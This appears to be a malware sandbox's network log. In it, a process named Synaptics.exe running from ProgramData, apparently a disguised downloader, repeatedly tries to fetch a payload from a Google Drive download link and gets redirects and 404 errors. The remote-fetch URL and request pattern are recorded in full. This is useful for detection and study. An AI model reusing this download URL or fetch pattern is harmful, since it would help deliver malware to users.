                                                                                                                                      2024-12-30 10:23:23 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:23 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-g9UfYUUPiYwbmjkqiM5XRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      66192.168.2.549851142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:23 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:23 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5KeSs4HnPBWgOkUlGJtnBsPYzT91RVoCvEFgC4i2OJognPef2dO63njyeUbNVs0acX
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:23 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-d0jFUUaeKHrMltp4L215pg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:23 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:23 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 4d 5f 4d 73 74 4b 59 62 4d 67 2d 4e 42 39 71 4a 68 2d 71 4d 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="QM_MstKYbMg-NB9qJh-qMw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:23 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      67192.168.2.549854142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:23 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:24 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6Zq8sTeMBuEhW9JUqnl0HI1zzCMSCevXuS2Zf1e0ZMoJ7nvvt59BfNaPnDWZd2y4-z
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:23 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-yC2sheh8fLVQg13vR2614Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:24 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:24 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 38 42 56 7a 51 62 51 70 57 7a 47 78 69 38 53 4d 36 70 75 2d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="u8BVzQbQpWzGxi8SM6pu-A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:24 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      68192.168.2.549860142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:24 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:24 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-cPsrBQ8T9cYw3pwzaSfNYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      69192.168.2.549861142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:24 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      70192.168.2.549862142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:24 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      71192.168.2.549865142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:24 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      72192.168.2.549877142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:25 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:25 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC4rBfxh_2NjrexE68ed_ywLpzGraTm7-5ay0X3TFOxkY2psU7uHBbxOxi8AzkQrnjfHZMtBius
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:25 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ty3dGGW3iXHtJn3rKJywzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:25 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:25 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 42 50 31 4c 44 51 44 7a 55 7a 77 72 7a 53 6c 6a 2d 77 37 41 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="mBP1LDQDzUzwrzSlj-w7AQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:25 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      73192.168.2.549875142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:25 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:25 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:25 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-0U_7ePlMlCLoxN0wdWfhpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      74192.168.2.549876142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:25 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:25 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
